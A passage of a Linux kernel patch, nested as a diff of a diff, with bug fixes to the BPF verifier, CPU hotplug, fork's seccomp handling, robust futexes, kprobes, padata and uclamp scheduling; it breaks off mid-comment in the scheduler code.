+@@ -2768,7 +2772,7 @@ static void mark_all_scalars_precise(struct bpf_verifier_env *env,
+ 		}
+ }
+ 
+-static int __mark_chain_precision(struct bpf_verifier_env *env, int regno,
++static int __mark_chain_precision(struct bpf_verifier_env *env, int frame, int regno,
+ 				  int spi)
+ {
+ 	struct bpf_verifier_state *st = env->cur_state;
+@@ -2785,7 +2789,7 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int regno,
+ 	if (!env->bpf_capable)
+ 		return 0;
+ 
+-	func = st->frame[st->curframe];
++	func = st->frame[frame];
+ 	if (regno >= 0) {
+ 		reg = &func->regs[regno];
+ 		if (reg->type != SCALAR_VALUE) {
+@@ -2866,7 +2870,7 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int regno,
+ 			break;
+ 
+ 		new_marks = false;
+-		func = st->frame[st->curframe];
++		func = st->frame[frame];
+ 		bitmap_from_u64(mask, reg_mask);
+ 		for_each_set_bit(i, mask, 32) {
+ 			reg = &func->regs[i];
+@@ -2932,12 +2936,17 @@ static int __mark_chain_precision(struct bpf_verifier_env *env, int regno,
+ 
+ int mark_chain_precision(struct bpf_verifier_env *env, int regno)
+ {
+-	return __mark_chain_precision(env, regno, -1);
++	return __mark_chain_precision(env, env->cur_state->curframe, regno, -1);
+ }
+ 
+-static int mark_chain_precision_stack(struct bpf_verifier_env *env, int spi)
++static int mark_chain_precision_frame(struct bpf_verifier_env *env, int frame, int regno)
+ {
+-	return __mark_chain_precision(env, -1, spi);
++	return __mark_chain_precision(env, frame, regno, -1);
++}
++
++static int mark_chain_precision_stack_frame(struct bpf_verifier_env *env, int frame, int spi)
++{
++	return __mark_chain_precision(env, frame, -1, spi);
+ }
+ 
+ static bool is_spillable_regtype(enum bpf_reg_type type)
+@@ -3186,14 +3195,17 @@ static int check_stack_write_var_off(struct bpf_verifier_env *env,
+ 		stype = &state->stack[spi].slot_type[slot % BPF_REG_SIZE];
+ 		mark_stack_slot_scratched(env, spi);
+ 
+-		if (!env->allow_ptr_leaks
+-				&& *stype != NOT_INIT
+-				&& *stype != SCALAR_VALUE) {
+-			/* Reject the write if there's are spilled pointers in
+-			 * range. If we didn't reject here, the ptr status
+-			 * would be erased below (even though not all slots are
+-			 * actually overwritten), possibly opening the door to
+-			 * leaks.
++		if (!env->allow_ptr_leaks && *stype != STACK_MISC && *stype != STACK_ZERO) {
++			/* Reject the write if the range we may write to has not
++			 * been initialized beforehand. If we didn't reject
++			 * here, the ptr status would be erased below (even
++			 * though not all slots are actually overwritten),
++			 * possibly opening the door to leaks.
++			 *
++			 * We do, however, catch the STACK_INVALID case below, and
++			 * only allow reading possibly uninitialized memory
++			 * later for CAP_PERFMON, as the write may not happen to
++			 * that slot.
+ 			 */
+ 			verbose(env, "spilled ptr in range of var-offset stack write; insn %d, ptr off: %d",
+ 				insn_idx, i);
+@@ -5159,10 +5171,6 @@ static int check_stack_range_initialized(
+ 			goto mark;
+ 		}
+ 
+-		if (is_spilled_reg(&state->stack[spi]) &&
+-		    base_type(state->stack[spi].spilled_ptr.type) == PTR_TO_BTF_ID)
+-			goto mark;
+-
+ 		if (is_spilled_reg(&state->stack[spi]) &&
+ 		    (state->stack[spi].spilled_ptr.type == SCALAR_VALUE ||
+ 		     env->allow_ptr_leaks)) {
+@@ -5193,6 +5201,11 @@ mark:
+ 		mark_reg_read(env, &state->stack[spi].spilled_ptr,
+ 			      state->stack[spi].spilled_ptr.parent,
+ 			      REG_LIVE_READ64);
++		/* We do not set REG_LIVE_WRITTEN for the stack slot, as we
++		 * cannot be sure whether the stack slot is written to or not.
++		 * Hence, we must still conservatively propagate reads upwards
++		 * even if the helper may write to the entire memory range.
++		 */
+ 	}
+ 	return update_stack_depth(env, state, min_off);
+ }
+@@ -9211,6 +9224,11 @@ static int adjust_reg_min_max_vals(struct bpf_verifier_env *env,
+ 				return err;
+ 			return adjust_ptr_min_max_vals(env, insn,
+ 						       dst_reg, src_reg);
++		} else if (dst_reg->precise) {
++			/* if dst_reg is precise, src_reg should be precise as well */
++			err = mark_chain_precision(env, insn->src_reg);
++			if (err)
++				return err;
+ 		}
+ 	} else {
+ 		/* Pretend the src is a reg with a known value, since we only
+@@ -11847,34 +11865,36 @@ static int propagate_precision(struct bpf_verifier_env *env,
+ {
+ 	struct bpf_reg_state *state_reg;
+ 	struct bpf_func_state *state;
+-	int i, err = 0;
++	int i, err = 0, fr;
+ 
+-	state = old->frame[old->curframe];
+-	state_reg = state->regs;
+-	for (i = 0; i < BPF_REG_FP; i++, state_reg++) {
+-		if (state_reg->type != SCALAR_VALUE ||
+-		    !state_reg->precise)
+-			continue;
+-		if (env->log.level & BPF_LOG_LEVEL2)
+-			verbose(env, "propagating r%d\n", i);
+-		err = mark_chain_precision(env, i);
+-		if (err < 0)
+-			return err;
+-	}
++	for (fr = old->curframe; fr >= 0; fr--) {
++		state = old->frame[fr];
++		state_reg = state->regs;
++		for (i = 0; i < BPF_REG_FP; i++, state_reg++) {
++			if (state_reg->type != SCALAR_VALUE ||
++			    !state_reg->precise)
++				continue;
++			if (env->log.level & BPF_LOG_LEVEL2)
++				verbose(env, "frame %d: propagating r%d\n", i, fr);
++			err = mark_chain_precision_frame(env, fr, i);
++			if (err < 0)
++				return err;
++		}
+ 
+-	for (i = 0; i < state->allocated_stack / BPF_REG_SIZE; i++) {
+-		if (!is_spilled_reg(&state->stack[i]))
+-			continue;
+-		state_reg = &state->stack[i].spilled_ptr;
+-		if (state_reg->type != SCALAR_VALUE ||
+-		    !state_reg->precise)
+-			continue;
+-		if (env->log.level & BPF_LOG_LEVEL2)
+-			verbose(env, "propagating fp%d\n",
+-				(-i - 1) * BPF_REG_SIZE);
+-		err = mark_chain_precision_stack(env, i);
+-		if (err < 0)
+-			return err;
++		for (i = 0; i < state->allocated_stack / BPF_REG_SIZE; i++) {
++			if (!is_spilled_reg(&state->stack[i]))
++				continue;
++			state_reg = &state->stack[i].spilled_ptr;
++			if (state_reg->type != SCALAR_VALUE ||
++			    !state_reg->precise)
++				continue;
++			if (env->log.level & BPF_LOG_LEVEL2)
++				verbose(env, "frame %d: propagating fp%d\n",
++					(-i - 1) * BPF_REG_SIZE, fr);
++			err = mark_chain_precision_stack_frame(env, fr, i);
++			if (err < 0)
++				return err;
++		}
+ 	}
+ 	return 0;
+ }
+@@ -13386,6 +13406,10 @@ static int opt_subreg_zext_lo32_rnd_hi32(struct bpf_verifier_env *env,
+ 		if (!bpf_jit_needs_zext() && !is_cmpxchg_insn(&insn))
+ 			continue;
+ 
++		/* Zero-extension is done by the caller. */
++		if (bpf_pseudo_kfunc_call(&insn))
++			continue;
++
+ 		if (WARN_ON(load_reg == -1)) {
+ 			verbose(env, "verifier bug. zext_dst is set, but no reg is defined\n");
+ 			return -EFAULT;
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index bbad5e375d3ba..98a7a7b1471b7 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -663,21 +663,51 @@ static bool cpuhp_next_state(bool bringup,
+ 	return true;
+ }
+ 
+-static int cpuhp_invoke_callback_range(bool bringup,
+-				       unsigned int cpu,
+-				       struct cpuhp_cpu_state *st,
+-				       enum cpuhp_state target)
++static int __cpuhp_invoke_callback_range(bool bringup,
++					 unsigned int cpu,
++					 struct cpuhp_cpu_state *st,
++					 enum cpuhp_state target,
++					 bool nofail)
+ {
+ 	enum cpuhp_state state;
+-	int err = 0;
++	int ret = 0;
+ 
+ 	while (cpuhp_next_state(bringup, &state, st, target)) {
++		int err;
++
+ 		err = cpuhp_invoke_callback(cpu, state, bringup, NULL, NULL);
+-		if (err)
++		if (!err)
++			continue;
++
++		if (nofail) {
++			pr_warn("CPU %u %s state %s (%d) failed (%d)\n",
++				cpu, bringup ? "UP" : "DOWN",
++				cpuhp_get_step(st->state)->name,
++				st->state, err);
++			ret = -1;
++		} else {
++			ret = err;
+ 			break;
++		}
+ 	}
+ 
+-	return err;
++	return ret;
++}
++
++static inline int cpuhp_invoke_callback_range(bool bringup,
++					      unsigned int cpu,
++					      struct cpuhp_cpu_state *st,
++					      enum cpuhp_state target)
++{
++	return __cpuhp_invoke_callback_range(bringup, cpu, st, target, false);
++}
++
++static inline void cpuhp_invoke_callback_range_nofail(bool bringup,
++						      unsigned int cpu,
++						      struct cpuhp_cpu_state *st,
++						      enum cpuhp_state target)
++{
++	__cpuhp_invoke_callback_range(bringup, cpu, st, target, true);
+ }
+ 
+ static inline bool can_rollback_cpu(struct cpuhp_cpu_state *st)
+@@ -999,7 +1029,6 @@ static int take_cpu_down(void *_param)
+ 	struct cpuhp_cpu_state *st = this_cpu_ptr(&cpuhp_state);
+ 	enum cpuhp_state target = max((int)st->target, CPUHP_AP_OFFLINE);
+ 	int err, cpu = smp_processor_id();
+-	int ret;
+ 
+ 	/* Ensure this CPU doesn't handle any more interrupts. */
+ 	err = __cpu_disable();
+@@ -1012,13 +1041,10 @@ static int take_cpu_down(void *_param)
+ 	 */
+ 	WARN_ON(st->state != (CPUHP_TEARDOWN_CPU - 1));
+ 
+-	/* Invoke the former CPU_DYING callbacks */
+-	ret = cpuhp_invoke_callback_range(false, cpu, st, target);
+-
+ 	/*
+-	 * DYING must not fail!
++	 * Invoke the former CPU_DYING callbacks. DYING must not fail!
+ 	 */
+-	WARN_ON_ONCE(ret);
++	cpuhp_invoke_callback_range_nofail(false, cpu, st, target);
+ 
+ 	/* Give up timekeeping duties */
+ 	tick_handover_do_timer();
+@@ -1296,16 +1322,14 @@ void notify_cpu_starting(unsigned int cpu)
+ {
+ 	struct cpuhp_cpu_state *st = per_cpu_ptr(&cpuhp_state, cpu);
+ 	enum cpuhp_state target = min((int)st->target, CPUHP_AP_ONLINE);
+-	int ret;
+ 
+ 	rcu_cpu_starting(cpu);	/* Enables RCU usage on this CPU. */
+ 	cpumask_set_cpu(cpu, &cpus_booted_once_mask);
+-	ret = cpuhp_invoke_callback_range(true, cpu, st, target);
+ 
+ 	/*
+ 	 * STARTING must not fail!
+ 	 */
+-	WARN_ON_ONCE(ret);
++	cpuhp_invoke_callback_range_nofail(true, cpu, st, target);
+ }
+ 
+ /*
+@@ -2326,8 +2350,10 @@ static ssize_t target_store(struct device *dev, struct device_attribute *attr,
+ 
+ 	if (st->state < target)
+ 		ret = cpu_up(dev->id, target);
+-	else
++	else if (st->state > target)
+ 		ret = cpu_down(dev->id, target);
++	else if (WARN_ON(st->target != target))
++		st->target = target;
+ out:
+ 	unlock_device_hotplug();
+ 	return ret ? ret : count;
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 7f04f995c9754..732b392fc5c63 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -11193,13 +11193,15 @@ static int pmu_dev_alloc(struct pmu *pmu)
+ 
+ 	pmu->dev->groups = pmu->attr_groups;
+ 	device_initialize(pmu->dev);
+-	ret = dev_set_name(pmu->dev, "%s", pmu->name);
+-	if (ret)
+-		goto free_dev;
+ 
+ 	dev_set_drvdata(pmu->dev, pmu);
+ 	pmu->dev->bus = &pmu_bus;
+ 	pmu->dev->release = pmu_dev_release;
++
++	ret = dev_set_name(pmu->dev, "%s", pmu->name);
++	if (ret)
++		goto free_dev;
++
+ 	ret = device_add(pmu->dev);
+ 	if (ret)
+ 		goto free_dev;
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 08969f5aa38d5..844dfdc8c639c 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -535,6 +535,9 @@ void put_task_stack(struct task_struct *tsk)
+ 
+ void free_task(struct task_struct *tsk)
+ {
++#ifdef CONFIG_SECCOMP
++	WARN_ON_ONCE(tsk->seccomp.filter);
++#endif
+ 	release_user_cpus_ptr(tsk);
+ 	scs_release(tsk);
+ 
+@@ -2406,12 +2409,6 @@ static __latent_entropy struct task_struct *copy_process(
+ 
+ 	spin_lock(&current->sighand->siglock);
+ 
+-	/*
+-	 * Copy seccomp details explicitly here, in case they were changed
+-	 * before holding sighand lock.
+-	 */
+-	copy_seccomp(p);
+-
+ 	rv_task_fork(p);
+ 
+ 	rseq_fork(p, clone_flags);
+@@ -2428,6 +2425,14 @@ static __latent_entropy struct task_struct *copy_process(
+ 		goto bad_fork_cancel_cgroup;
+ 	}
+ 
++	/* No more failure paths after this point. */
++
++	/*
++	 * Copy seccomp details explicitly here, in case they were changed
++	 * before holding sighand lock.
++	 */
++	copy_seccomp(p);
++
+ 	init_task_pid_links(p);
+ 	if (likely(p->pid)) {
+ 		ptrace_init_task(p, (clone_flags & CLONE_PTRACE) || trace);
+diff --git a/kernel/futex/core.c b/kernel/futex/core.c
+index b22ef1efe7511..514e4582b8634 100644
+--- a/kernel/futex/core.c
++++ b/kernel/futex/core.c
+@@ -638,6 +638,7 @@ static int handle_futex_death(u32 __user *uaddr, struct task_struct *curr,
+ 			      bool pi, bool pending_op)
+ {
+ 	u32 uval, nval, mval;
++	pid_t owner;
+ 	int err;
+ 
+ 	/* Futex address must be 32bit aligned */
+@@ -659,6 +660,10 @@ retry:
+ 	 * 2. A woken up waiter is killed before it can acquire the
+ 	 *    futex in user space.
+ 	 *
++	 * In the second case, the wake up notification could be generated
++	 * by the unlock path in user space after setting the futex value
++	 * to zero or by the kernel after setting the OWNER_DIED bit below.
++	 *
+ 	 * In both cases the TID validation below prevents a wakeup of
+ 	 * potential waiters which can cause these waiters to block
+ 	 * forever.
+@@ -667,24 +672,27 @@ retry:
+ 	 *
+ 	 *	1) task->robust_list->list_op_pending != NULL
+ 	 *	   @pending_op == true
+-	 *	2) User space futex value == 0
++	 *	2) The owner part of user space futex value == 0
+ 	 *	3) Regular futex: @pi == false
+ 	 *
+ 	 * If these conditions are met, it is safe to attempt waking up a
+ 	 * potential waiter without touching the user space futex value and
+-	 * trying to set the OWNER_DIED bit. The user space futex value is
+-	 * uncontended and the rest of the user space mutex state is
+-	 * consistent, so a woken waiter will just take over the
+-	 * uncontended futex. Setting the OWNER_DIED bit would create
+-	 * inconsistent state and malfunction of the user space owner died
+-	 * handling.
++	 * trying to set the OWNER_DIED bit. If the futex value is zero,
++	 * the rest of the user space mutex state is consistent, so a woken
++	 * waiter will just take over the uncontended futex. Setting the
++	 * OWNER_DIED bit would create inconsistent state and malfunction
++	 * of the user space owner died handling. Otherwise, the OWNER_DIED
++	 * bit is already set, and the woken waiter is expected to deal with
++	 * this.
+ 	 */
+-	if (pending_op && !pi && !uval) {
++	owner = uval & FUTEX_TID_MASK;
++
++	if (pending_op && !pi && !owner) {
+ 		futex_wake(uaddr, 1, 1, FUTEX_BITSET_MATCH_ANY);
+ 		return 0;
+ 	}
+ 
+-	if ((uval & FUTEX_TID_MASK) != task_pid_vnr(curr))
++	if (owner != task_pid_vnr(curr))
+ 		return 0;
+ 
+ 	/*
+diff --git a/kernel/gcov/gcc_4_7.c b/kernel/gcov/gcc_4_7.c
+index 7971e989e425b..74a4ef1da9ad7 100644
+--- a/kernel/gcov/gcc_4_7.c
++++ b/kernel/gcov/gcc_4_7.c
+@@ -82,6 +82,7 @@ struct gcov_fn_info {
+  * @version: gcov version magic indicating the gcc version used for compilation
+  * @next: list head for a singly-linked list
+  * @stamp: uniquifying time stamp
++ * @checksum: unique object checksum
+  * @filename: name of the associated gcov data file
+  * @merge: merge functions (null for unused counter type)
+  * @n_functions: number of instrumented functions
+@@ -94,6 +95,10 @@ struct gcov_info {
+ 	unsigned int version;
+ 	struct gcov_info *next;
+ 	unsigned int stamp;
++	/* Since GCC 12.1, a checksum field is added. */
++#if (__GNUC__ >= 12)
++	unsigned int checksum;
++#endif
+ 	const char *filename;
+ 	void (*merge[GCOV_COUNTERS])(gcov_type *, unsigned int);
+ 	unsigned int n_functions;
+diff --git a/kernel/irq/internals.h b/kernel/irq/internals.h
+index f09c60393e559..5fdc0b5575797 100644
+--- a/kernel/irq/internals.h
++++ b/kernel/irq/internals.h
+@@ -52,6 +52,7 @@ enum {
+  * IRQS_PENDING			- irq is pending and replayed later
+  * IRQS_SUSPENDED		- irq is suspended
+  * IRQS_NMI			- irq line is used to deliver NMIs
++ * IRQS_SYSFS			- descriptor has been added to sysfs
+  */
+ enum {
+ 	IRQS_AUTODETECT		= 0x00000001,
+@@ -64,6 +65,7 @@ enum {
+ 	IRQS_SUSPENDED		= 0x00000800,
+ 	IRQS_TIMINGS		= 0x00001000,
+ 	IRQS_NMI		= 0x00002000,
++	IRQS_SYSFS		= 0x00004000,
+ };
+ 
+ #include "debug.h"
+diff --git a/kernel/irq/irqdesc.c b/kernel/irq/irqdesc.c
+index a91f9001103ce..fd09962744014 100644
+--- a/kernel/irq/irqdesc.c
++++ b/kernel/irq/irqdesc.c
+@@ -288,22 +288,25 @@ static void irq_sysfs_add(int irq, struct irq_desc *desc)
+ 	if (irq_kobj_base) {
+ 		/*
+ 		 * Continue even in case of failure as this is nothing
+-		 * crucial.
++		 * crucial and failures in the late irq_sysfs_init()
++		 * cannot be rolled back.
+ 		 */
+ 		if (kobject_add(&desc->kobj, irq_kobj_base, "%d", irq))
+ 			pr_warn("Failed to add kobject for irq %d\n", irq);
++		else
++			desc->istate |= IRQS_SYSFS;
+ 	}
+ }
+ 
+ static void irq_sysfs_del(struct irq_desc *desc)
+ {
+ 	/*
+-	 * If irq_sysfs_init() has not yet been invoked (early boot), then
+-	 * irq_kobj_base is NULL and the descriptor was never added.
+-	 * kobject_del() complains about a object with no parent, so make
+-	 * it conditional.
++	 * Only invoke kobject_del() when kobject_add() was successfully
++	 * invoked for the descriptor. This covers both early boot, where
++	 * sysfs is not initialized yet, and the case of a failed
++	 * kobject_add() invocation.
+ 	 */
+-	if (irq_kobj_base)
++	if (desc->istate & IRQS_SYSFS)
+ 		kobject_del(&desc->kobj);
+ }
+ 
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 3050631e528d9..a35074f0daa1a 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -2364,6 +2364,14 @@ static void kill_kprobe(struct kprobe *p)
+ 
+ 	lockdep_assert_held(&kprobe_mutex);
+ 
++	/*
++	 * The module is going away. We should disarm the kprobe which
++	 * is using ftrace, because ftrace framework is still available at
++	 * 'MODULE_STATE_GOING' notification.
++	 */
++	if (kprobe_ftrace(p) && !kprobe_disabled(p) && !kprobes_all_disarmed)
++		disarm_kprobe_ftrace(p);
++
+ 	p->flags |= KPROBE_FLAG_GONE;
+ 	if (kprobe_aggrprobe(p)) {
+ 		/*
+@@ -2380,14 +2388,6 @@ static void kill_kprobe(struct kprobe *p)
+ 	 * the original probed function (which will be freed soon) any more.
+ 	 */
+ 	arch_remove_kprobe(p);
+-
+-	/*
+-	 * The module is going away. We should disarm the kprobe which
+-	 * is using ftrace, because ftrace framework is still available at
+-	 * 'MODULE_STATE_GOING' notification.
+-	 */
+-	if (kprobe_ftrace(p) && !kprobe_disabled(p) && !kprobes_all_disarmed)
+-		disarm_kprobe_ftrace(p);
+ }
+ 
+ /* Disable one kprobe */
+diff --git a/kernel/module/decompress.c b/kernel/module/decompress.c
+index c033572d83f0e..720e719253cd1 100644
+--- a/kernel/module/decompress.c
++++ b/kernel/module/decompress.c
+@@ -114,8 +114,8 @@ static ssize_t module_gzip_decompress(struct load_info *info,
+ 	do {
+ 		struct page *page = module_get_next_page(info);
+ 
+-		if (!page) {
+-			retval = -ENOMEM;
++		if (IS_ERR(page)) {
++			retval = PTR_ERR(page);
+ 			goto out_inflate_end;
+ 		}
+ 
+@@ -173,8 +173,8 @@ static ssize_t module_xz_decompress(struct load_info *info,
+ 	do {
+ 		struct page *page = module_get_next_page(info);
+ 
+-		if (!page) {
+-			retval = -ENOMEM;
++		if (IS_ERR(page)) {
++			retval = PTR_ERR(page);
+ 			goto out;
+ 		}
+ 
+diff --git a/kernel/padata.c b/kernel/padata.c
+index e5819bb8bd1dc..de90af5fcbe6b 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -207,14 +207,16 @@ int padata_do_parallel(struct padata_shell *ps,
+ 	pw = padata_work_alloc();
+ 	spin_unlock(&padata_works_lock);
+ 
++	if (!pw) {
++		/* Maximum works limit exceeded, run in the current task. */
++		padata->parallel(padata);
++	}
++
+ 	rcu_read_unlock_bh();
+ 
+ 	if (pw) {
+ 		padata_work_init(pw, padata_parallel_worker, padata, 0);
+ 		queue_work(pinst->parallel_wq, &pw->pw_work);
+-	} else {
+-		/* Maximum works limit exceeded, run in the current task. */
+-		padata->parallel(padata);
+ 	}
+ 
+ 	return 0;
+@@ -388,13 +390,16 @@ void padata_do_serial(struct padata_priv *padata)
+ 	int hashed_cpu = padata_cpu_hash(pd, padata->seq_nr);
+ 	struct padata_list *reorder = per_cpu_ptr(pd->reorder_list, hashed_cpu);
+ 	struct padata_priv *cur;
++	struct list_head *pos;
+ 
+ 	spin_lock(&reorder->lock);
+ 	/* Sort in ascending order of sequence number. */
+-	list_for_each_entry_reverse(cur, &reorder->list, list)
++	list_for_each_prev(pos, &reorder->list) {
++		cur = list_entry(pos, struct padata_priv, list);
+ 		if (cur->seq_nr < padata->seq_nr)
+ 			break;
+-	list_add(&padata->list, &cur->list);
++	}
++	list_add(&padata->list, pos);
+ 	spin_unlock(&reorder->lock);
+ 
+ 	/*
+diff --git a/kernel/power/snapshot.c b/kernel/power/snapshot.c
+index 2a406753af904..c20ca5fb9adc8 100644
+--- a/kernel/power/snapshot.c
++++ b/kernel/power/snapshot.c
+@@ -1723,8 +1723,8 @@ static unsigned long minimum_image_size(unsigned long saveable)
+  * /sys/power/reserved_size, respectively).  To make this happen, we compute the
+  * total number of available page frames and allocate at least
+  *
+- * ([page frames total] + PAGES_FOR_IO + [metadata pages]) / 2
+- *  + 2 * DIV_ROUND_UP(reserved_size, PAGE_SIZE)
++ * ([page frames total] - PAGES_FOR_IO - [metadata pages]) / 2
++ *  - 2 * DIV_ROUND_UP(reserved_size, PAGE_SIZE)
+  *
+  * of them, which corresponds to the maximum size of a hibernation image.
+  *
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 93416afebd59c..14d9384fba056 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -2418,7 +2418,7 @@ void rcu_force_quiescent_state(void)
+ 	struct rcu_node *rnp_old = NULL;
+ 
+ 	/* Funnel through hierarchy to reduce memory contention. */
+-	rnp = __this_cpu_read(rcu_data.mynode);
++	rnp = raw_cpu_read(rcu_data.mynode);
+ 	for (; rnp != NULL; rnp = rnp->parent) {
+ 		ret = (READ_ONCE(rcu_state.gp_flags) & RCU_GP_FLAG_FQS) ||
+ 		       !raw_spin_trylock(&rnp->fqslock);
+diff --git a/kernel/relay.c b/kernel/relay.c
+index d7edc934c56d5..88bcb09f0a1f2 100644
+--- a/kernel/relay.c
++++ b/kernel/relay.c
+@@ -148,13 +148,13 @@ static struct rchan_buf *relay_create_buf(struct rchan *chan)
+ {
+ 	struct rchan_buf *buf;
+ 
+-	if (chan->n_subbufs > KMALLOC_MAX_SIZE / sizeof(size_t *))
++	if (chan->n_subbufs > KMALLOC_MAX_SIZE / sizeof(size_t))
+ 		return NULL;
+ 
+ 	buf = kzalloc(sizeof(struct rchan_buf), GFP_KERNEL);
+ 	if (!buf)
+ 		return NULL;
+-	buf->padding = kmalloc_array(chan->n_subbufs, sizeof(size_t *),
++	buf->padding = kmalloc_array(chan->n_subbufs, sizeof(size_t),
+ 				     GFP_KERNEL);
+ 	if (!buf->padding)
+ 		goto free_buf;
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index daff72f003858..535af9fbea7b8 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -1392,7 +1392,7 @@ static inline void uclamp_idle_reset(struct rq *rq, enum uclamp_id clamp_id,
+ 	if (!(rq->uclamp_flags & UCLAMP_FLAG_IDLE))
+ 		return;
+ 
+-	WRITE_ONCE(rq->uclamp[clamp_id].value, clamp_value);
++	uclamp_rq_set(rq, clamp_id, clamp_value);
+ }
+ 
+ static inline
+@@ -1543,8 +1543,8 @@ static inline void uclamp_rq_inc_id(struct rq *rq, struct task_struct *p,
+ 	if (bucket->tasks == 1 || uc_se->value > bucket->value)
+ 		bucket->value = uc_se->value;
+ 
+-	if (uc_se->value > READ_ONCE(uc_rq->value))
+-		WRITE_ONCE(uc_rq->value, uc_se->value);
++	if (uc_se->value > uclamp_rq_get(rq, clamp_id))
++		uclamp_rq_set(rq, clamp_id, uc_se->value);
+ }
+ 
+ /*
+@@ -1610,7 +1610,7 @@ static inline void uclamp_rq_dec_id(struct rq *rq, struct task_struct *p,
+ 	if (likely(bucket->tasks))
+ 		return;
+ 
+-	rq_clamp = READ_ONCE(uc_rq->value);
++	rq_clamp = uclamp_rq_get(rq, clamp_id);
+ 	/*
+ 	 * Defensive programming: this should never happen. If it happens,
+ 	 * e.g. due to future modification, warn and fixup the expected value.
+@@ -1618,7 +1618,7 @@ static inline void uclamp_rq_dec_id(struct rq *rq, struct task_struct *p,
+ 	SCHED_WARN_ON(bucket->value > rq_clamp);
+ 	if (bucket->value >= rq_clamp) {
+ 		bkt_clamp = uclamp_rq_max_value(rq, clamp_id, uc_se->value);
+-		WRITE_ONCE(uc_rq->value, bkt_clamp);
++		uclamp_rq_set(rq, clamp_id, bkt_clamp);
+ 	}
+ }
+ 
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index e4a0b8bd941c7..0f32acb05055f 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4280,14 +4280,16 @@ static inline unsigned long task_util_est(struct task_struct *p)
+ }
+ 
+ #ifdef CONFIG_UCLAMP_TASK
+-static inline unsigned long uclamp_task_util(struct task_struct *p)
++static inline unsigned long uclamp_task_util(struct task_struct *p,
++					     unsigned long uclamp_min,
++					     unsigned long uclamp_max)
+ {
+-	return clamp(task_util_est(p),
+-		     uclamp_eff_value(p, UCLAMP_MIN),
+-		     uclamp_eff_value(p, UCLAMP_MAX));
++	return clamp(task_util_est(p), uclamp_min, uclamp_max);
+ }
+ #else
+-static inline unsigned long uclamp_task_util(struct task_struct *p)
++static inline unsigned long uclamp_task_util(struct task_struct *p,
++					     unsigned long uclamp_min,
++					     unsigned long uclamp_max)
+ {
+ 	return task_util_est(p);
+ }
+@@ -4426,10 +4428,135 @@ done:
+ 	trace_sched_util_est_se_tp(&p->se);
+ }
+ 
+-static inline int task_fits_capacity(struct task_struct *p,
+-				     unsigned long capacity)
++static inline int util_fits_cpu(unsigned long util,
++				unsigned long uclamp_min,
++				unsigned long uclamp_max,
++				int cpu)
+ {
+-	return fits_capacity(uclamp_task_util(p), capacity);
++	unsigned long capacity_orig, capacity_orig_thermal;
++	unsigned long capacity = capacity_of(cpu);
++	bool fits, uclamp_max_fits;
++
++	/*
++	 * Check if the real util fits without any uclamp boost/cap applied.
++	 */
++	fits = fits_capacity(util, capacity);
++
++	if (!uclamp_is_used())
++		return fits;
++
++	/*
++	 * We must use capacity_orig_of() for comparing against uclamp_min and
++	 * uclamp_max. We only care about capacity pressure (by using
++	 * capacity_of()) for comparing against the real util.
++	 *
++	 * If a task is boosted to 1024 for example, we don't want a tiny
++	 * pressure to skew the check whether it fits a CPU or not.
++	 *
++	 * Similarly if a task is capped to capacity_orig_of(little_cpu), it
++	 * should fit a little cpu even if there's some pressure.
++	 *
++	 * Only exception is for thermal pressure since it has a direct impact
++	 * on available OPP of the system.
++	 *
++	 * We honour it for uclamp_min only as a drop in performance level
++	 * could result in not getting the requested minimum performance level.
++	 *
++	 * For uclamp_max, we can tolerate a drop in performance level as the
++	 * goal is to cap the task. So it's okay if it's getting less.
++	 *
++	 * In case of capacity inversion, which is not handled yet, we should
++	 * honour the inverted capacity for both uclamp_min and uclamp_max all
++	 * the time.
++	 */
++	capacity_orig = capacity_orig_of(cpu);
++	capacity_orig_thermal = capacity_orig - arch_scale_thermal_pressure(cpu);
++
++	/*
++	 * We want to force a task to fit a cpu as implied by uclamp_max.
++	 * But we do have some corner cases to cater for.
++	 *
++	 *
++	 *                                 C=z
++	 *   |                             ___
++	 *   |                  C=y       |   |
++	 *   |_ _ _ _ _ _ _ _ _ ___ _ _ _ | _ | _ _ _ _ _  uclamp_max
++	 *   |      C=x        |   |      |   |
++	 *   |      ___        |   |      |   |
++	 *   |     |   |       |   |      |   |    (util somewhere in this region)
++	 *   |     |   |       |   |      |   |
++	 *   |     |   |       |   |      |   |
++	 *   +----------------------------------------
++	 *         cpu0        cpu1       cpu2
++	 *
++	 *   In the above example if a task is capped to a specific performance
++	 *   point, y, then when:
++	 *
++	 *   * util = 80% of x then it does not fit on cpu0 and should migrate
++	 *     to cpu1
++	 *   * util = 80% of y then it is forced to fit on cpu1 to honour
++	 *     uclamp_max request.
++	 *
++	 *   which is what we're enforcing here. A task always fits if
++	 *   uclamp_max <= capacity_orig. But when uclamp_max > capacity_orig,
++	 *   the normal upmigration rules should still apply.
++	 *
++	 *   Only exception is when we are on max capacity, then we need to be
++	 *   careful not to block overutilized state. This is so because:
++	 *
++	 *     1. There's no concept of capping at max_capacity! We can't go
++	 *        beyond this performance level anyway.
++	 *     2. The system is being saturated when we're operating near
++	 *        max capacity, so it doesn't make sense to block overutilized.
++	 */
++	uclamp_max_fits = (capacity_orig == SCHED_CAPACITY_SCALE) && (uclamp_max == SCHED_CAPACITY_SCALE);
++	uclamp_max_fits = !uclamp_max_fits && (uclamp_max <= capacity_orig);
++	fits = fits || uclamp_max_fits;
++
++	/*
++	 *
++	 *                                 C=z
++	 *   |                             ___       (region a, capped, util >= uclamp_max)
++	 *   |                  C=y       |   |
++	 *   |_ _ _ _ _ _ _ _ _ ___ _ _ _ | _ | _ _ _ _ _ uclamp_max
++	 *   |      C=x        |   |      |   |
